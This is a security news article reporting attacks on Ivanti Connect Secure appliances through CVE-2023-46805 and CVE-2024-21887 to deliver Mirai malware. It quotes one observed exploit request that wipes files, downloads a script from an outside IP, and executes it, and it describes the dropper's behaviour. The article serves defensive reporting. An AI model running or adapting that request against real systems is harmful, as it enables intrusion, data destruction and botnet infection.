Hackers Actively Exploiting Ivanti Pulse Secure Vulnerabilities

Juniper Threat Labs has reported active exploitation attempts targeting vulnerabilities in Ivanti Pulse Secure VPN appliances.

These vulnerabilities, identified as CVE-2023-46805 and CVE-2024-21887, have been exploited to deliver the Mirai botnet, among other malware, posing a significant threat to network security worldwide.


Free Webinar : Live API Attack Simulation

94% of organizations experience security problems in production APIs, and one in five suffers a data breach. As a result, cyber-attacks on APIs increased from 35% in 2022 to 46% in 2023, and this trend continues to rise:

Key Takeaways:

  • An exploit of OWASP API Top 10 vulnerability
  • A brute force ATO (Account Takeover) attack on API
  • A DDoS attack on an API
  • Positive security model automation to prevent API attacks

Start protecting your APIs from hackers

CVE-2023-46805: Authentication Bypass

CVE-2023-46805 is a critical security flaw affecting Ivanti Connect Secure (ICS) and Ivanti Policy Secure gateways.

This vulnerability allows remote attackers to bypass authentication mechanisms and gain unauthorized access to restricted resources.

The flaw resides in the /api/v1/totp/user-backup-code endpoint, which lacks sufficient security checks. This enables attackers to exploit a path traversal flaw and access public-facing areas without proper authentication.

Affected versions include 9. x and 22. x of both Ivanti Connect Secure and Ivanti Policy Secure Gateways.

CVE-2024-21887: Command Injection

The second vulnerability, CVE-2024-21887, is a command injection flaw found in the web components of Ivanti Connect Secure and Ivanti Policy Secure.

This vulnerability allows attackers to send specially crafted requests to execute arbitrary commands on the appliance.

This flaw is exploitable over the internet and involves a command injection in the /api/v1/license/key-status/; API call.

By exploiting the CVE-2023-46805 vulnerability to gain access to this endpoint, attackers can inject malicious payloads, which can lead to the execution of shell commands and the delivery of malware, including the Mirai botnet.

On-Demand Webinar to Secure the Top 3 SME Attack Vectors: Watch for Free.

Mirai Botnet Delivery

Juniper Threat Labs’ analysis has revealed instances where attackers have used these vulnerabilities to deliver Mirai payloads through shell scripts.

The following is an example of the observed request: 

Hackers Actively Exploiting Ivanti Pulse Secure Vulnerabilities

The encoded URL decodes to (This will come in a code block in WordPress) 
GET /api/v1/totp/user-backup-code/../../license/keys-status/rm -rf *; cd /tmp; wget http://192[.]3[.]152[.]183/wtf.sh; chmod 777 wtf.sh; ./wtf.sh HTTP/1.1 

The observed attack involves a command sequence that attempts to wipe files, download a script from a remote server, set executable permissions, and execute the script, potentially leading to a system infection.

The content of wtf.sh (in WordPress, this should come in a code block) Note that the file names use several offensive and derogatory terms and are shown for this research only.

There are five system directories that these tools try to get to: “/tmp”, “/var/run”, “/mnt”, “/root”, and “/”. It gets a file called “lol” from a certain URL (http://192[.]3[.]152[.]183/mips) once it finds a place it can get to.

It lets the downloaded file run after downloading it and runs it with the argument “0day_machine.” Using “||” makes sure that the next commands only run if the tries to change directories failed before.

This means that the following command runs in the first directory that can be reached in the list.

Juniper analyzed the payloads, Which have been identified as part of the Mirai botnet, indicating the severity of the threat posed by these vulnerabilities.

Exploiting Ivanti Pulse Secure’s vulnerabilities for Mirai botnet delivery underscores the evolving landscape of cyber threats.

Juniper Networks SRX Series Next-Generation Firewall (NGFW) customers with an IDP license are protected against these vulnerabilities using specific signatures for CVE-2023-46805 and CVE-2024-21887.

Organizations using Ivanti Pulse Secure appliances are urged to apply the provided patches immediately and review their security posture to protect against these and future vulnerabilities.

Indicators of Compromise

Hash Values of Mirai: 



 Is Your Network Under Attack? - Read CISO’s Guide to Avoiding the Next Breach - Download Free Guide

The post Hackers Actively Exploiting Ivanti Pulse Secure Vulnerabilities appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.

Go to Source
Author: Divya